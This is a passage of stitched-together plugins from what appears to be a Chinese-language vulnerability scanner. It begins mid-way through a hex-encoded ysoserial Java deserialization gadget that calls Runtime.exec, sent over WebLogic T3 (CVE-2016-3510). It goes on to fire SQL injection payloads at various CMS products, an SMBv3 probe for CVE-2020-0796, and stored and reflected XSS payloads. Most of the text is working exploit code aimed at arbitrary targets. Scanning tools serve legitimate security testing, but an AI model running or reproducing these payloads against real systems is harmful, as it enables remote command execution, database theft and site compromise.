625472616e736c65745061796c6f6164010040636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f72756e74696d652f41627374726163745472616e736c65740100146a6176612f696f2f53657269616c697a61626c65010039636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f5472616e736c6574457863657074696f6e01001f79736f73657269616c2f7061796c6f6164732f7574696c2f476164676574730100083c636c696e69743e0100116a6176612f6c616e672f52756e74696d6507002a01000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b0c002c002d0a002b002e01000463616c6308003001000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0c003200330a002b003401000d537461636b4d61705461626c6501001d79736f73657269616c2f50776e6572313930393035393330363833303701001f4c79736f73657269616c2f50776e657231393039303539333036383330373b002100020003000100040001001a000500060001000700000002000800040001000a000b0001000c0000002f00010001000000052ab70001b100000002000d0000000600010000002e000e0000000c000100000005000f003800000001001300140002000c0000003f0000000300000001b100000002000d00000006000100000033000e00000020000300000001000f0038000000000001001500160001000000010017001800020019000000040001001a00010013001b0002000c000000490000000400000001b100000002000d00000006000100000037000e0000002a000400000001000f003800000000000100150016000100000001001c001d000200000001001e001f00030019000000040001001a00080029000b0001000c00000024000300020000000fa70003014cb8002f1231b6003557b1000000010036000000030001030002002000000002002100110000000a000100020023001000097571007e000d000001d4cafebabe00000032001b0a0003001507001707001807001901001073657269616c56657273696f6e5549440100014a01000d436f6e7374616e7456616c75650571e669ee3c6d47180100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c6501000474686973010003466f6f01000c496e6e6572436c61737365730100254c79736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324466f6f3b01000a536f7572636546696c6501000c476164676574732e6a6176610c000a000b07001a01002379736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324466f6f0100106a6176612f6c616e672f4f626a6563740100146a6176612f696f2f53657269616c697a61626c6501001f79736f73657269616c2f7061796c6f6164732f7574696c2f47616467657473002100020003000100040001001a000500060001000700000002000800010001000a000b0001000c0000002f00010001000000052ab70001b100000002000d0000000600010000003b000e0000000c000100000005000f001200000002001300000002001400110000000a000100020016001000097074000450776e727077010078737d00000001001d6a617661782e786d6c2e7472616e73666f726d2e54656d706c61746573787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372003273756e2e7265666c6563742e616e6e6f746174696f6e2e416e6e6f746174696f6e496e766f636174696f6e48616e646c657255caf50f15cb7ea50200024c000c6d656d62657256616c75657374000f4c6a6176612f7574696c2f4d61703b4c0004747970657400114c6a6176612f6c616e672f436c6173733b7870737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c77080000001000000001740008663561356136303871007e0009787672001d6a617661782e786d6c2e7472616e73666f726d2e54656d706c617465730000000000000000000000787078'
server_addr = (url, port)
t3handshake(sock, server_addr)
buildT3RequestObject(sock)
rs, poc = sendEvilObjData(sock, payload)
con = re.findall(
"org.apache.commons.collections.functors.InvokerTransformer",
str(rs), re.S)
if len(con) > 0:
Medusa = "{}存在WeblogicT3反序列化命令执行漏洞(CVE-2016-3510)\r\n验证数据:\r\n使用POC:{}\r\n返回数据包:{}\r\n正则数据:{}\r\n".format(
url, poc, str(rs), con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, "", **kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) # 调用写入类传入URL和错误插件名
def medusa(Url,RandomAgent,proxies=None,**kwargs):
proxies=Proxies().result(proxies)
scheme, url, port =UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = '/search.php?c=5&hit=1&s=%27and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20concat%28md5(c)%29%20from%20tcylnet_user%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29and%27'
payload_url = scheme + "//" + url + ":" + str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
}
resp = requests.get(payload_url,headers=headers, timeout=6, proxies=proxies,verify=False)
con = resp.text
if con.find("4a8a08f09d37b73795649038408b5f33") != -1:
Medusa = "{}存在CuteCMSSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/index.php?ctl=ajax&act=load_topic_reply_list"
payload_url = scheme + "://" + url + ":" + str(port) + payload
data = 'topic_id=-1%20union%20select%0b1,2,3,md5(123456),5,6,7,8,9%23'
resp = requests.post(payload_url,
headers=Headers,
data=data,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find("e10adc3949ba59abbe56e057f20f883e") != -1:
Medusa = "{}存在FanweSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = '/index.php?ac=search&at=taglist&tagkey=%2527,tags%29%20or%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20concat%28md5%283.1415%29%29%29%20from"%20information_schema.tables%20where%20table_schema=database%28%29%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23'
payload_url = scheme + "://" + url + ":" + str(port) + payload
resp = requests.get(payload_url,
headers=Headers,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find("63e1f04640e83605c1d177544a5a0488") != -1:
Medusa = "{}存在EspCMSSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = '/ikaimi/rolling/list.php?line=10&page=&classid=10)%20UNION%20ALL%20SELECT%20CONCAT(0x71786a7171,md5(123),0x716a6b6b71),NULL,NULL,NULL,NULL--%20'
payload_url = scheme + "://" + url +":"+ str(port) + payload
resp = requests.get(payload_url, headers=Headers, timeout=6, proxies=proxies, verify=False)
con = resp.text
code = resp.status_code
if code==200 and con.find("202cb962ac59075b964b07152d234b70")!= -1:
Medusa = "{}存在EmpireCMSSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url, RandomAgent, UnixTimestamp):
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
sql = "SELECT md5('testvul') as administratorsName"
payload = "/Export/Export.log.inc.php?ExportSQL=" + urllib.parse.quote(
base64.b64encode(sql.encode('utf-8')).decode('ascii'))
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent':
RandomAgent,
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
s = requests.session()
resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
con = resp.text
if con.find("e87ebbaed6f97f26e222e030eddbad1c") != -1:
Medusa = "{}存在EnableQSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
UnixTimestamp).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception:
_ = VulnerabilityInfo('').info.get('algroup')
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url,RandomAgent,UnixTimestamp):
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/?m=photo&a=showmore&nowpage=123&uid=aa' union select md5(c),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#"
payload_url = scheme + "://" + url +":"+ str(port)+ payload
headers = {
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
s = requests.session()
resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
con = resp.text
code = resp.status_code
if code==200 and con.find("4a8a08f09d37b73795649038408b5f33") != -1 :
Medusa = "{}存在EasyTalkSQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回结果:{}\r\n".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据
WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url,RandomAgent,proxies=None,**kwargs):
proxies=Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = '''/?m=space&a=home&hq=a%" union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,md5(c),20,21,22,23#'''
payload_url = scheme + "://" + url +":"+ str(port)+ payload
headers = {
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
}
resp = requests.get(payload_url,headers=headers, proxies=proxies,timeout=6, verify=False)
con = resp.text
code = resp.status_code
if code==200 and con.find("4a8a08f09d37b73795649038408b5f33") != -1 :
Medusa = "{}存在EasyTalkSQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回结果:{}\r\n".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url,RandomAgent,proxies=None,**kwargs):
proxies=Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,md5(c))+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a"
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
resp = requests.get(payload_url, headers=headers, timeout=6,proxies=proxies, verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find("4a8a08f09d37b73795649038408b5f33") != -1:
Medusa = "{}存在CTSCMSsql注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回结果:{}\r\n".format(url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(**kwargs) -> None:
Url = kwargs.get("Url") # 获取传入的url参数
Result = UrlProcessing().result(Url)
url = str(Result[1])
try:
payload = b'\x00\x00\x00\xc0\xfeSMB@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$\x00\x08\x00\x01\x00\x00\x00\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x02\x00\x00\x00\x02\x02\x10\x02"\x02$\x02\x00\x03\x02\x03\x10\x03\x11\x03\x00\x00\x00\x00\x01\x00&\x00\x00\x00\x00\x00\x01\x00 \x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\n\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00'
sock = socket.socket(socket.AF_INET)
sock.settimeout(3)
ip = socket.gethostbyname(url)
sock.connect((ip, 445))
sock.send(payload)
nb, = struct.unpack(">I", sock.recv(4))
res = sock.recv(nb)
if (not res[68:70] == b"\x11\x03") or (not res[70:72] == b"\x02\x00"):
pass
else:
Medusa = "{}存在WindowsSMBv3协议漏洞(CVE-2020-0796)\r\n验证数据:\r\n返回值:{}\r\nIP值:{}\r\n".format(
url, res, ip)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, "", **kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
proxies=Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/?m=comment&a=delmsg"
data = "cmid=123' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,user_id,md5(c),22,23#"
payload_url = scheme + "://" + url +":"+ str(port)+ payload
resp = requests.post(payload_url,headers=Headers,proxies=proxies, data=data, timeout=6, verify=False)
con = resp.text
code = resp.status_code
if code==200 and con.find("4a8a08f09d37b73795649038408b5f33") != -1 :
Medusa = "{}存在EasyTalkSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url,RandomAgent,proxies=None,**kwargs):
proxies=Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
rm=randoms().result(20)
payload = "/index.php?s=/admin/articlem/insert/navTabId/listarticle/callbackType/closeCurrent"
data = '''tid=&title=%3Cimg+src%3Dx+onerror%3Dalert({})%3E&keyword=cscanpoc&ispush=0&iscommend=1&isslides=0&islock=0&summary=cscanpoc&content=%09%09%09%09%09cscanpoc'''.format(rm)
payload_url = scheme + "://" + url +":"+ str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/json",
}
resp = requests.post(payload_url,headers=headers, data=data, proxies=proxies,timeout=6, verify=False)
con = resp.text
code = resp.status_code
if code== 200 and con.find("<td><img src=x onerror=alert({})></td>".format(rm)) != -1 :
Medusa = "{}存在EasyCMS跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url, RandomAgent, UnixTimestamp):
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
rm = randoms().result(20)
payload = "/main/calendar/agenda_list.php?type=personal%27%3E%3Cscript%3Econfirm%28{}%29%3C%2fscript%3E%3C%21--".format(
rm)
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent':
RandomAgent,
'Content-Type':
'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
s = requests.session()
resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
con = resp.text
if con.find("<script>confirm({})</script>".format(rm)) != -1:
Medusa = "{}存在ChamiloLMS跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
UnixTimestamp).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception:
_ = VulnerabilityInfo('').info.get('algroup')
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
